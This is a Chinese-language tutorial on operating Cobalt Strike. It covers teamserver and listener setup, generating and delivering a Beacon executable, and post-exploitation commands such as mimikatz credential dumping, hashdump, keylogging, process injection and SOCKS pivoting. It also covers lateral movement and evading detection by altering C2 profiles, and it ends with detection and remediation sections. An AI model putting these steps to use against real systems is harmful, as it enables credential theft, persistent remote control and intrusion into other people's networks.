Cobalt Strike 基础使用与 Beacon 实战

Cobalt Strike 4.x 从 teamserver 到 Beacon 上线、后渗透命令、横向与隧道,注意特征规避与授权边界。

写在前面:合法学习边界

Cobalt Strike 是商用红队工具,仅用于授权测试或授权渗透项目。未经授权使用、上线真实系统可能触犯法律。

一、工具定位

Cobalt Strike(CS)是红队常用的 C2 框架,核心组件:

1
2
3
4
Teamserver:服务端,管理团队与 Beacon
Client:攻击者操作界面
Listener:监听反向连接
Beacon:植入目标主机的后门会话

它的价值不只是“反弹 Shell”,而是团队协作 + 后渗透 + 横向的一体化平台。

二、启动与配置

启动 Teamserver

1
2
# 用法:teamserver <监听IP> <密码> [c2profile]
./teamserver 192.168.1.100 YourPassword

连接 Client

1
2
打开 Cobalt Strike → Connect
输入 teamserver IP、密码

新建 Listener(监听器)

1
2
3
Listeners → Add
Type 选 windows/beacon_https(加密回流,比 http 稳)
设置 Host 为攻击机 IP、端口(如 443/8443)

三、生成 Payload 并上线

生成 Beacon

1
2
3
Attacks → Packages → Windows Executable
选 Listener,生成 exe
把 exe 投递到目标执行(钓鱼/漏洞利用后)

上线确认

1
目标执行后,Cobalt Strike 的会话列表出现 Beacon

四、Beacon 常用命令

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
shell whoami            # 执行系统命令
shell ipconfig /all
upload /path/x.exe      # 上传文件
download C:\x.txt       # 下载文件
screenshot              # 截屏
ps                      # 进程列表
migrate <pid>           # 进程注入迁移(稳会话)
getsystem               # 提权到 SYSTEM
hashdump                # 抓本地哈希
mimikatz sekurlsa::logonpasswords   # 抓凭据
keylogger               # 键盘记录
sleep 60                # 回连间隔
browserpivot            # 浏览器劫持
socks 1080              # 开 Socks 代理
spawn                   # 派生新会话

五、横向与隧道

横向移动

1
2
3
用 beacon 的 psexec_psh / wmi 模块
目标:已抓到的哈希/账号横向登录其他主机
配合 mimikatz hashdump + psexec_psh

Socks 代理

1
2
beacon> socks 1080
本地 proxychains 指到 CS 客户端 → 访问内网

影响与风险

C2 一旦上线目标,攻击者能做的事远不止弹个 Shell:

1
2
3
长期驻留、随时远程控制
抓取凭据、横向移动整个内网
数据窃取、勒索、持久后门

风险等级:严重。CS 这类平台化工具放大了单点失陷的影响面。

六、特征与规避(务必注意)

1
2
3
4
默认 Beacon 特征明显:固定端口、固定 User-Agent、默认流量指纹
安全产品能识别默认 CS → 需改 C2 Profile 隐藏特征
上线频率(sleep)、进程迁移、内存中运行可降低落地风险
免杀与规避是独立课题,授权内使用

七、检测(对立面)

1
2
3
4
特征域名/固定回连流量
Beacon 内存特征、异常进程注入
抓包识别 C2 协议指纹
EDR 检测 CS 常用手法(mimikatz、hashdump、进程注入)

修复

1
2
3
4
5
清除失陷主机上的 Beacon 进程与持久化
排查计划任务/服务/注册表中的自启
加固出站策略,阻断 C2 回连
EDR 检测进程注入、mimikatz 等手法
修复后复测:无外联、无异常进程

八、小结

Cobalt Strike 的流程是:teamserver → listener → payload 上线 → beacon 后渗透 → 横向。它把红队工作“平台化”,但也因此特征明显——攻防双方都在研究它的指纹。授权使用、注意特征,是两件必须同时做的事。

本站使用「署名 4.0 国际」创作共享协议,可自由转载、引用,但需署名作者且注明文章出处